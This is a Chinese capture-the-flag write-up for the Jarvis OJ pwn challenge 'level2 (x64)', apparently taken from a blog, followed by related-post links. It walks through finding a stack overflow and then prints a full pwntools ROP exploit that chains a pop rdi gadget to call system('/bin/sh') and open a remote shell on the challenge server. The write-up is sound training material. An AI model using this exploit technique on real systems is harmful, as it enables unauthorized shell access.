[Jarvis OJ - PWN]——[XMAN]level2(x64)
[Jarvis OJ - PWN]——[XMAN]level2(x64)
- 题目地址:https://www.jarvisoj.com/challenges
- 题目:
checksec一下,是64位程序。开启了NX保护
在IDA看一下,main函数中有我们要的system函数,
vulnerable_function函数中也有。不过可惜参数都不对,任取一个system地址就好就好。但是我们找到了栈溢出的利用函数read。buf距离rbp的距离为0x80
查找一下看看有没有**"/bin/sh"字符串,发现地址在0x0600A90**
**因为是64位程序,所以函数的前六个参数依次会使用rdi、rsi、rdx、rcx、r8、r9寄存器进行传递。system只有一个参数,使用的寄存器是rdi。**查找一下汇编指令pop rdi的地址,0x04006b3。
所以exploit为
from pwn import *
p = remote("pwn2.jarvisoj.com",9882)
binsh = 0x0600A90
pop_rdi=0x04006b3
sys = 0x0400603 #0x040063E 0x04004C0
payload = 'a'*(0x80 + 0x8)
payload += p64(pop_rdi)+ p64(binsh) #将"/bin/sh"pop到rdi寄存器中
payload += p64(sys) #执行system函数
p.recvline()
p.sendline(payload)
p.interactive()
[Jarvis OJ - PWN]——[XMAN]level2(x64)相关推荐
- [Jarvis OJ - PWN]——[XMAN]level2
[Jarvis OJ - PWN]--[XMAN]level2 题目地址:https://www.jarvisoj.com/challenges 题目: 首先,checksec一下.32位并且没有开启 ...
- [Jarvis OJ - PWN]——[XMAN]level4
[Jarvis OJ - PWN]--[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x1 ...
- [Jarvis OJ - PWN]——[XMAN]level3_x64
[Jarvis OJ - PWN]--[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再 ...
- [Jarvis OJ - PWN]——[XMAN]level3
[Jarvis OJ - PWN]--[XMAN]level3 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,32位程序开启了NX保 ...
- [Jarvis OJ - PWN]——[XMAN]level0
[Jarvis OJ - PWN]--[XMAN]level0 题目地址:https://www.jarvisoj.com/challenges 题目: checksec看看,64位,开启了NX保护 ...
- [Jarvis OJ - PWN]——[XMAN]level1
[Jarvis OJ - PWN]--[XMAN]level1 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,什么保护都没有开.32 ...
- Jarvis OJ PWN题解 持续更新~
最近沉(被)迷(迫)学pwn 看我们的志琦大佬 我就知道 pwn 玩玩就行 但是 不认真学 不行 然后向大佬打听了几个pwn的平台网站 打算 玩一下 这里找到了 Jarvis OJ ...
- [Jarvis OJ - PWN]——Typo(内涵peak小知识)
[Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...
- [Jarvis OJ - PWN]——Backdoor
[Jarvis OJ - PWN]--Backdoor 题目地址: https://www.jarvisoj.com/challenges 题目: 额,怎么说呢这个题有点出乎我的意料, 有点晕乎乎的. ...
最新文章
- 在家远程办公,如何才能让员工高效工作?
- IDEA多行缩进快捷键
- Fabrice Bellard:一个人抵得上一个百人团队
- [转] context-param与init-param的区别与作用
- [云炬创业基础笔记]第九章企业的法律形态测试4
- android通过webservice连接SQL数据库(二)客户端
- 06-CoreData增删改查
- 课时55.详情和概要标签(理解)
- FreeMarker 集合遍历
- Typora如何插入公式
- 黑马程序员--C语言基础之--sizeof()运算符的使用以及注意
- C语言 float、double数据在内存中的存储方式
- MariaDB安装、卸载以及相关设置(Linux服务器Mysql部署)
- SendMessage 与 PostMessage
- js css自动幻灯片切换,非常漂亮的JS+CSS图片幻灯切换特效
- ABB电磁流量计ProcessMaster FEP630
- javaFX2.0场景(Scene)分析及使用,多场景切换实现
- 人在囧途之火车调研篇
- 北大本科生凭芯片研究获全球竞赛第一!一作发表8篇EDA领域顶会论文,“致力探索卡脖子难题”
- 人像分割之ExtremeC3Net
热门文章
- xss_url 通关_11-16
- [Python人工智能] 二十八.Keras深度学习中文文本分类万字总结(CNN、TextCNN、LSTM、BiLSTM、BiLSTM+Attention)
- HarmonyOS之深入解析设备标识符的功能和使用
- 中国大学MOOC 人工智能导论第五章测试
- 10.2.3 基本属性
- 为什么学Python
- 信息学奥赛一本通(C++)在线评测系统——基础(一)C++语言——1067:整数的个数
- DSP 的双缓冲串口程序设计
- 【STM32】ESP8266模块简介
- 【Linux系统编程】Linux 线程浅析